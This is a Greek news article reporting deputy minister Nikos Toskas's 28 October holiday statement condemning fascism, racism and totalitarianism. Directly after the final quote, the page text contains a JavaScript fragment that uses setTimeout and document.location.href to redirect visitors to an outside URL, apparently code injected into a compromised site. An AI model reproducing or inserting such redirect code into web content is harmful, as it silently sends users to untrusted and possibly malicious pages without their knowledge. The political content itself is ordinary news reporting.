Τόσκας: Ο ολοκληρωτισμός δεν έχει θέση στη χώρα που γέννησε τη Δημοκρατία

0
8

 

«Ο ολοκληρωτισμός δεν έχει θέση στη χώρα που γέννησε τη Δημοκρατία», τόνισε ο αναπληρωτής υπουργός Προστασίας του Πολίτη, Νίκος Τόσκας, σε δήλωσή του, με αφορμή την εθνική εορτή της 28ης Οκτωβρίου, ενώ ταυτόχρονα έστειλε σαφές αντιρατσιστικό και αντιφασιστικό μήνυμα προς την Ευρώπη, υπογραμμίζοντας ότι «φασίζουσες αντιλήψεις, ρατσισμός και μισαλλοδοξία, με δόλιους τρόπους και μεθόδους, επιχειρούν να ανακτήσουν χαμένα εδάφη».

«Η εθνική μας εορτή της 28ης Οκτωβρίου συμβολίζει τη μεγαλειώδη αντίσταση του ελληνικού λαού απέναντι στον φασισμό και τον ναζισμό. Είναι η κορυφαία πατριωτική μάχη των Ελλήνων, ο αγώνας μας υπέρ βωμών και εστιών, σε μία περίοδο που ο λαός μας, μαζί με άλλους λαούς, πολεμούσε χύνοντας το αίμα του για την αποτροπή της κυριαρχίας των δυνάμεων του Άξονα στην Ευρώπη. Ο λαός μας πολέμησε τον εχθρό που ήταν, ταυτόχρονα, εισβολέας και φασίστας», αναφέρει στο μήνυμά του ο κ. Τόσκας.

«Η δημοκρατική αντίληψη και η πατριωτική συνείδηση αποτελούν τα βασικά θεμέλια για την οικοδόμηση μίας χώρας που θα ατενίζει περήφανη και ελεύθερη το μέλλον των πολιτών της. Οι αγώνες του ’40 μπορεί να δόθηκαν σε περασμένες εποχές, αλλά το μήνυμα παραμένει ακόμα επίκαιρο σε μία Ευρώπη όπου φασίζουσες αντιλήψεις, ρατσισμός και μισαλλοδοξία, με δόλιους τρόπους και μεθόδους επιχειρούν να ανακτήσουν χαμένα εδάφη. Ο ολοκληρωτισμός δεν έχει θέση στη χώρα που γέννησε τη Δημοκρατία. Και η αντίσταση σε κάθε μορφής ολοκληρωτισμό αποτελεί τη μεγαλύτερη σύγχρονη πρόκληση για τον λαό μας, για αυτή καθαυτή την αξιοπρέπεια της εθνικής του υπόστασης», επεσήμανε ο αναπληρωτής υπουργός Προστασίας του Πολίτη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here